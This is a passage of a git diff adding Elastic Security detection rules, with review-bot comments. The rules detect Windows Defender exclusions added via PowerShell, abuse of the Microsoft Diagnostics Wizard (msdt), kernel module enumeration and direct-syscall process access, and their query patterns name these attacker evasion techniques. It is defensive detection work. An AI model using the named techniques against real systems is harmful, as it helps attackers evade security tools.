the activity further, review the specific exclusion and its intent. 
There are many legitimate reasons for exclusions, so it's important to gain context.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Exclusion lists for antimalware capabilities should always be routinely monitored for review.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")) and\n process.args : (\"*Add-MpPreference*\", \"*Set-MpPreference*\") and\n process.args : (\"*-Exclusion*\")\n", + "references": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` 
to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_110.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_110.json new file mode 100644 index 00000000000..25a8b7fbd28 --- /dev/null 
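Review bot: The `index` list queries `logs-windows.*` and `logs-system.security*` and `related_integrations` declares the `windows` and `system` packages, yet `tags` only carries `Data Source: Elastic Endgame` and `Data Source: Elastic Defend`; the Adobe Hijack Persistence rule earlier in this diff tags `Data Source: Sysmon` for its Sysmon index, so the data-source tags here look incomplete relative to the indices queried — presumably the upstream tagging convention should decide which tags are expected for these sources. In `note`, the remediation bullet `Exclusion lists for antimalware capabilities should always be routinely monitored for review.` is circular; `Routinely review antimalware exclusion lists.` states the action plainly.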
+++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_110.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender configuration settings using PowerShell to add exclusions at the folder directory or process level.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Exclusions Added via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Exclusions Added via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows. Since this software product is used to prevent and stop malware, it's important to monitor what specific exclusions are made to the product's configuration settings. These can often be signs of an adversary or malware trying to bypass Windows Defender's capabilities. One of the more notable [examples](https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/) was observed in 2018 where Trickbot incorporated mechanisms to disable Windows Defender to avoid detection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the exclusion in order to determine the intent behind it.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If the exclusion specifies a suspicious file or path, retrieve the file(s) and determine if malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives due to how often network administrators legitimately configure exclusions. In order to validate the activity further, review the specific exclusion and its intent. 
There are many legitimate reasons for exclusions, so it's important to gain context.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Exclusion lists for antimalware capabilities should always be routinely monitored for review.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")) and\n process.args : (\"*Add-MpPreference*\", \"*Set-MpPreference*\") and\n process.args : (\"*-Exclusion*\")\n", + "references": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` 
to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_108.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_108.json new file mode 100644 index 00000000000..48ae884abfd --- /dev/null 
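Review bot: The `description` in this hunk understates what the `query` matches: `process.args : ("*-Exclusion*")` fires on any `-Exclusion*` parameter passed to Add-MpPreference/Set-MpPreference, not only the path and process ones the description names ("at the folder directory or process level"), so extension- or IP-based exclusions also alert. The triage text in `note` ("review the specific exclusion and its intent") already assumes the wider scope, and an analyst reading only the description could wrongly dismiss such an alert as out of scope. Suggested wording: `"description": "Identifies modifications to the Windows Defender configuration settings using PowerShell to add exclusions (for example at the folder, process, extension or IP address level)."`. If this file is a synced export from the rule source, the wording change belongs upstream or it will be overwritten on the next sync.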
+++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_108.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential abuse of the Microsoft Diagnostics Troubleshooting Wizard (MSDT) to proxy malicious command or binary execution via malicious process arguments.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Microsoft Diagnostics Wizard Execution", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.pe.original_file_name == \"msdt.exe\" or process.name : \"msdt.exe\") and\n (\n process.args : (\"IT_RebrowseForFile=*\", \"ms-msdt:/id\", \"ms-msdt:-id\", \"*FromBase64*\") or\n\n (process.args : \"-af\" and process.args : \"/skip\" and\n process.parent.name : (\"explorer.exe\", \"cmd.exe\", \"powershell.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"rundll32.exe\", \"regsvr32.exe\") and\n process.args : (\"?:\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml\", \"PCWDiagnostic.xml\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\")) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.name : \"msdt.exe\" and process.name != null) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.executable : (\"?:\\\\Windows\\\\system32\\\\msdt.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msdt.exe\"))\n )\n", + "references": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_109.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_109.json new file mode 100644 index 00000000000..07a79e01357 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_109.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential abuse of the Microsoft Diagnostics Troubleshooting Wizard (MSDT) to proxy malicious command or binary execution via malicious process arguments.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Microsoft Diagnostics Wizard Execution", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.pe.original_file_name == \"msdt.exe\" or process.name : \"msdt.exe\") and\n (\n process.args : (\"IT_RebrowseForFile=*\", \"ms-msdt:/id\", \"ms-msdt:-id\", \"*FromBase64*\") or\n\n (process.args : \"-af\" and process.args : \"/skip\" and\n process.parent.name : (\"explorer.exe\", \"cmd.exe\", \"powershell.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"rundll32.exe\", \"regsvr32.exe\") and\n process.args : (\"?:\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml\", \"PCWDiagnostic.xml\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\")) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.name : \"msdt.exe\" and process.name != null) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.executable : (\"?:\\\\Windows\\\\system32\\\\msdt.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msdt.exe\"))\n )\n", + "references": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_209.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_209.json new file mode 100644 index 00000000000..eafbd5a740a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_209.json 
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module.", + "false_positives": [ + "Security tools and device drivers may run these programs in order to enumerate kernel modules. Use of these programs by ordinary users is uncommon. These can be exempted by process name or username." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Kernel Modules", + "new_terms_fields": [ + "process.parent.command_line", + "process.command_line", + "host.id" + ], + "query": "event.category:process and host.os.type:linux and event.type:start and event.action:(exec or exec_event) and (\n (process.name:(lsmod or modinfo)) or \n (process.name:kmod and process.args:list) or \n (process.name:depmod and process.args:(--all or -a))\n) and not process.parent.name:(mkinitramfs or cryptroot or framebuffer or dracut or jem or thin-provisioning-tools\nor readykernel or lvm2 or vz-start or iscsi or mdadm or ovalprobes or bcache or plymouth or dkms or overlayroot or \nweak-modules or zfs)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2d8043ed-5bda-4caf-801c-c1feb7410504", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 209 + }, + "id": "2d8043ed-5bda-4caf-801c-c1feb7410504_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_211.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_211.json new file mode 100644 index 00000000000..1bcc8d6f4ff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_211.json 
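Review bot: The `setup` text pins one documentation link to a fixed release, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, while every other link in the same field uses `/current/`, so that one page will go stale as the stack moves on; change it to `https://www.elastic.co/guide/en/fleet/current/agent-policy.html` to match. Separately, `setup` states the rule requires data from Elastic Defend only, yet `index` also lists `endgame-*`, `tags` carries `Data Source: Elastic Endgame`, and the query's `exec_event` action presumably exists for that source. A single sentence noting that Elastic Endgame process events are also accepted would make the setup consistent with the rest of the rule. If this file is a synced export, both fixes belong in the upstream rule source.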
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Access via Direct System Call", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of 